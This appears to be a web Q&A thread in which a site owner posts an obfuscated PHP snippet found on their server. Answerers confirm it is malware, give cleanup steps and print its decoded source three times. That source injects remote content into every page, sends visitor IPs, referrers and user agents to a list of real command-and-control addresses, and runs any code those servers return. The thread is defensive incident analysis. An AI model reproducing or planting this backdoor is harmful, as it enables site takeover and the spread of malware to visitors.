GbFNlbEp3VkhwS1lVMHlUblJpUkVKaFZUSmtjbGR0TlVKak1HeEVWVzVhYTFkR1JuZFVNMnhUWlZad1dWVlhaRkZWTUVad1UxZHdNRTB5UmtoaVNFNWhWVEJHZGxOV1pHRmlSMGw1VjFjNVMxSXhjRE5UTVU1eVdqSldOVlZ1YkdGWFJrWnVVMVZOTUU5VmJFUlJiVEZoVFd4WmQxa3piRzVoTVhCMVVWaE9TbEpGVmpWVU1FNXlUakphV0ZkdGNHbFNlbXcyVjJ4T2JtRXhjSFZSV0VKUVpWWkplRmxyYUZKYU1VSlVVV3BDYW1KWGVEQlRNR2hQVFZac2RWUnFRbXBoVjJSeVdUSXhWMDFGZUVSUmJuQnJVMFZ3TTFscVRrNWlNSEJKVTIxNGExRXpaRzVUVjNnMFpWWm9TRTVYVG1waVNHZ3hVMWRzY2xvd2REVlJWRUpNVlRKek0xcHNaM2RhTUd4SVlrY3hTbEV5YURaYVJXaExaREpKZWxSWE9VdFRSbHA2V2tWT00yRldjRmxYYldocFVUQnNkMU5WVGtaUFZrSlVVVzB4V2xZemFEWlhiRTV6VGpCd1NXSXlaRkZWTUVvMldrVm9TMk5IVGtsVWJrNWFWMFUxZGxkc2FFNWlNazE2Vlc1c1dVMHdjSE5aTUdRMFlVWnJlVlpYT1VwaVZsbDVWMVprTTJGVmVFUlRWMnhOVVRGSmVGbHJhRkpqUlhSVll6SmtZVmRHY0c5WmEwNXVZVEpXY0dGNlpFcFNNVmt3V1Zab1VtSXdkRlZrUkd4b1ZqRnNibE13YUU5TlIwNTFVVzVhYW1WWFpISmFSbVEwVFVWNFJGTnRlRnBpVkZadlUxZHNjbG93YkZWTlJHeEtVakZ3YjFscmFFOWlSWFJaWXpKMFdVMVZOVWRXVjNoaFVteFdjMk15YkdGTmFtd3lWMnRPUzFwRmJFVk5SMlJxVFRGS05WZEVUa3RpUjA1SVpVZG9XazFzVm5aVFZ6RlhZVmRLZEZKWGJFMVJNR3h3VkVWT1UwMVhTa2xWV0VKUVRUQndjMXBGYUZkbFYwcHdVV3BDYW1Kc1duTlVlazE0WWtkS1NWUnRlRXBUU0ZJMVYyeG9VMDFYVG5ST1IyUmhZbFZhZWxsNlNsWk9NbHBaVFVkMFlXSlZXWGRaVldSWFpWVXhjMlJIVWtwU1JFSnVVMWR3YWswd2VIRmFNMmhOWVd0cmQxUldUVEJsVlRWVlZGZHNVR1ZXU25SWFZtaFRZakZ3V1ZOWWJGaE5WRUp1VlVaT1FtRlZOVVZYV0ZaT1lXeEZNVlJIY0ZaT1JYaHhVbGh3VDFVd2F6TlRhMlJoWVVkU1NHRkhlR3BoYTNCcFYwWk9RazlWYkVSVFdHaFBaV3hzTVZReFRUQmxWVFZGVWxoV1RsWkdWak5UVjNCNllURndkRkpxUW1oU01WbzFWRmQ0TUZwRmJFVk5SMlJLWVd4RmVWUkhjRTVOTUhoeFVsUktVRlY2VVhoVWJXeEtUakJ3U0ZkdGFHdFNNbWh6V1RKd1MxbHNhRlJSVkd4S1VUQnJNVlJyVFRCbFZUVkZVMWhXVG1Gc1ZYaFVSM0JPVFZWc2NXTXlkR0ZpVlZsM1dWVmtWMlZWTVhOa1IxSktVa1JDYmxOWGNFWk5NRGxFVGtob1QyRnJiREZVVmxKS1RsVjRjVk5ZYkU1bFZXc3pVMnRrWVdGSFVraGhSM2hxWVd0d2FWZEdUa0pQVld4RVUxaHdUbFY2VWpSVU1GSlNaRlV4Y1ZSVVFrMWhiWE41VTFkd2VtRXhjSFJTYWtKb1VqRmFOVlJYZURCYVJXeEZUVWRrU21GdFRYcFVSM0J5VFZWNGNWSlVVazFoYTFVd1ZERk9TazR3Y0VoWGJXaHJVakpvYzFreWNFdFpiR2hVVVZSc1NsRXdhekZVV0dzd1pVVTFObEZZVms1V1JUQjZWRWR3U21WVmJIRmpNblJoWWxWWmQxbFZaRmRsVlRGelpFZFNTbEpFUW01VFYzQkdUa1U1UkU1RVFrNVJlbEV4Vkd4Tk1HVlZOVVZWVjJ4UVpWWktkRmRXYUZOaU1YQlpVMWhzV0UxVVFtNVZSazVDWVZVeFZXRjZWazFoYTFZMFZHeE5NR1ZWTVRaU1dGWlBWa2RrY0ZRemJGTmlWbXhaVlcwNVlWZEZiRFZXZWtWM1dqRkNWRkZYYkZCU1JXd3hWRlpTY21WVmVIRmFlazVOWVd0VmVsUXdUa3BPTUhCSVYyMW9hMUl5YUhOWk1uQkxXV3hvVkZGVWJFcFJNR3cxVkZaU1dtUlZNWEZWVkVwTllXMXpNVlJIY0VwbFJUVlVVMVJrUzFJeGNHOWFSV1J2WWtkT2NWTnRTbGxWTUVVMVUxVk9TazVWTlZST1NHeE9Wa1ZXTVZSV1VtNWtWVFUyWVRKc1VFMHdOWFphUm1SaFlsZEtTRlpYT1V0U01YQnZXa1ZrYjJKSFRuRlRXRUpRVFd4d01sa3lNVmRoUm10NVdqSTVTMUl4Y0c5YVJXUnZZa2RPY1ZOWFpGcFhSVEZ1VTJ0b1YyVlZkRmxrU0VKaFlWVkdkbE5WWkVkaU1YQjFWbTEwWVdKWWFIUmFWekZUWWpGd2RHRkljRXhSTVVsNFdUSnNjbG93ZEZSUmFtUktVakJ3TlZkc1pFZGphMnhGWkVSc2JWZEVRVGxKYVd0d1QzbEJQU0lwS1RzZyIpKTsg";if (!function_exists("Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ")){ function Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($fmG17jH6h8R6pfvV6ODRd6K,$iot3u6fS){$AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7 = '';foreach($fmG17jH6h8R6pfvV6ODRd6K as $seJ3kuSEl4K8TkDMQJMs34XHkz5KM2gM6QFgboLmiml2wOFdoh){$AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7 .= chr($seJ3kuSEl4K8TkDMQJMs34XHkz5KM2gM6QFgboLmiml2wOFdoh - $iot3u6fS);}return $AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7;}$hKVywz3gfZQjZpsdvfedFEEg3UyYs7BlInK4MDaRsR1h6 = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($byJtFKIhXRt8KPNfT1me8ooOBXon8QgWfQgLqPSdxb,8658);$UsopvTU00NLoC = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($ARPcAGpFFDTk4GyiFfpsl5zXmfFqCHsAp8DQFSlbm5lhCJq8P,8470);$D4fUhPPUiQCBxt = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($J0BQOOWj4oRnP7liN,7352);$UCUMQ98AUYryzF0tSVyD = $UsopvTU00NLoC('$kiNmYfN',$hKVywz3gfZQjZpsdvfedFEEg3UyYs7BlInK4MDaRsR1h6.'('.$D4fUhPPUiQCBxt.'($kiNmYfN));');$UCUMQ98AUYryzF0tSVyD($UbjPmIKWlC);} /*ad0b18735e68b25aa9c4374221824db5_off*/ ?>
I have no idea what it is and it's impossible to decipher. Nothing is output when you access the file directly online. Any ideas? Does it seem malicious?
If you and none of your developers have any idea where it came from then I guess you are under an attack :(. The immediate fix is to do the following,
Clean all your files.
Switch to secure FTP access immediately
Do some more research on internet about this attack and see what other actions you need to take.
You need to do it quickly since browsers like chrome and FF will notice it soon and would start showing your site as malicious to users.
You most certainly got hacked.
I did the fun to poke into the code.
The code is base64_encoded multiple times and then eval'd. Result is:
if (!function_exists("GetMama")){
function mod_con($buf){
str_ireplace("<body>","<body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
return $buf;}
str_ireplace("</body>","</body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf);
return $buf;}
return $buf;}
function opanki($buf){
$gz_e = false;$h_l = headers_list();
if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}
if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");
file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
gzclose($zd);
unlink($tmpfname);
$contents = gzencode($contents);}
else {
$contents = mod_con($buf);}
$len = strlen($contents);
header("Content-Length: ".$len);
return($contents);}
function GetMama(){
$mother = "mdrmediagroup.com";
return $mother;}
ob_start("opanki");
function ahfudflfzdhfhs($pa){
$mama = GetMama();
$file = urlencode(__FILE__);
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];} else {
$host = "";}
if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];} else {
$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);}
else {
$ref = "";}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));}
else {
$ua = "";}
if (isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);}
else {$qs = "";}
$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;}
if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(#file_get_contents($url_0 . $url_1));
$try = false;}
if($try){
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {
$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);
$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);}
fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}}
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult));
eval($z);
exit();}
if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);
return true;}
else {
return false;}}
$father2[] = "77.81.241.253";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "31.184.234.96";$father2[] = "77.95.18.189";$father2[] = "93.170.137.22";$father2[] = "188.40.95.244";$father2[] = "199.115.231.58";$father2[] = "82.192.87.178";$father2[] = "216.246.99.215";$father2[] = "95.211.18.79";shuffle($father2);foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) { break ;}}}
Yes it is malicious code, its a bunch of base64 encoded stings evaled, and the resulting code is:
<?php
if (!function_exists("GetMama")){
function mod_con($buf){
str_ireplace("<body>","<body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
return $buf;
}
str_ireplace("</body>","</body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf);
return $buf;}return $buf;}function opanki($buf){
$gz_e = false;
$h_l = headers_list();
if (in_array("Content-Encoding: gzip", $h_l)) {
$gz_e = true;
}if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");
file_put_contents($tmpfname, $buf);
$zd = gzopen($tmpfname, "r");
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
gzclose($zd);unlink($tmpfname);
$contents = gzencode($contents);
} else {$contents = mod_con($buf);}
$len = strlen($contents);
header("Content-Length: ".$len);
return($contents);}
function GetMama(){
$mother = "mdrmediagroup.com";
return $mother;}ob_start("opanki");
function ahfudflfzdhfhs($pa){
$mama = GetMama();
$file = urlencode(__FILE__);
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];
} else {
$host = "";
}if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];
} else {$ip = "";
}if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);
} else {$ref = "";}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {
$ua = "";
}if (
isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);
} else {$qs = "";}
$url_0 = "http://" . $pa;
$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;
} if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(#file_get_contents($url_0 . $url_1));
$try = false;
}if($try){
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n";
$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);
}fclose($fp);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}
}
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult));
eval($z);
exit();
}if (strpos($ult,"ebna") !== false){
$_SERVER["good"] = str_replace("ebna","",$ult);return true;
}else {return false;}}
$father2[] = "77.81.241.253";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "31.184.234.96";
$father2[] = "77.95.18.189";
$father2[] = "93.170.137.22";
$father2[] = "188.40.95.244";
$father2[] = "199.115.231.58";
$father2[] = "82.192.87.178";
$father2[] = "216.246.99.215";
$father2[] = "95.211.18.79";
shuffle($father2);
foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) { break ;}
}
}
?>
To expand on my comment...
Are you using a CMS (Wordpress, Joomla, etc.)? If so, some 3rd party plugin and theme developers attempt to encrypt their code so that it isn't pirated...
If you wrote the site from scratch, look down.
Are you the only developer?
(YES) --> You've been hacked. --> Check your log files. -> Look for unusual activity/hack attempts. --> Attempt to find the vulnerability and patch it. --> Remove the malicious code.
(NO) --> Ask the other developer(s) if they put it there. If the answer is no, go to the above solution.
As Khan said, time is of the essence to a certain extent, because services like Google and Web of Trust will begin to mark your site as malicious. At the same time, don't just delete the foreign code. If you manage to unravel it at a later date, you may be able to figure out what it does and who it reports to --> who the hackers are.
Also look at the server logs... If your server has been rooted, then the only way to keep the hacker out would be to reinstall it.
The code is:
if (!function_exists("GetMama"))
{
function mod_con($buf){
str_ireplace("","",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("","" . stripslashes($_SERVER["good"]),$buf);
return $buf;
}
str_ireplace("","",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("",stripslashes($_SERVER["good"])."",$buf);
return $buf;
}
return $buf;
}
function opanki($buf){
$gz_e = false;$h_l = headers_list();
if (in_array("Content-Encoding: gzip", $h_l)) {
$gz_e = true;
}
if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");
file_put_contents($tmpfname, $buf);
$zd = gzopen($tmpfname, "r");
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
gzclose($zd);
unlink($tmpfname);
$contents = gzencode($contents);
}
else {
$contents = mod_con($buf);
}
$len = strlen($contents);
header("Content-Length: ".$len);
return($contents);
}
function GetMama(){
$mother = "mdrmediagroup.com";
return $mother;
}
ob_start("opanki");
function ahfudflfzdhfhs($pa){
$mama = GetMama();
$file = urlencode(FILE);
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];
} else {
$host = "";
}
if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];
}
else {
$ip = "";
}
if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);
}
else {
$ref = "";
}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
}
else {
$ua = "";
}
if (isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);
}
else {
$qs = "";
}
$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;
}
if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(#file_get_contents($url_0 . $url_1));
$try = false;
}
if($try){
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {
$out = "GET $url_1 HTTP/1.0\r\n";
$out .= "Host: $pa\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);
}
fclose($fp);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}
}
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult)); e
val($z);
exit();
}
if (strpos($ult,"ebna") !== false){
$_SERVER["good"] = str_replace("ebna","",$ult);
return true;
}
else {
return false;
}
}
$father2[] = "77.81.241.253";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "31.184.234.96";
$father2[] = "77.95.18.189";
$father2[] = "93.170.137.22";
$father2[] = "188.40.95.244";
$father2[] = "199.115.231.58";
$father2[] = "82.192.87.178";
$father2[] = "216.246.99.215";
$father2[] = "95.211.18.79";
shuffle($father2);
foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) {
break ;
}
}
}
Unpacked by hand so its more readable :)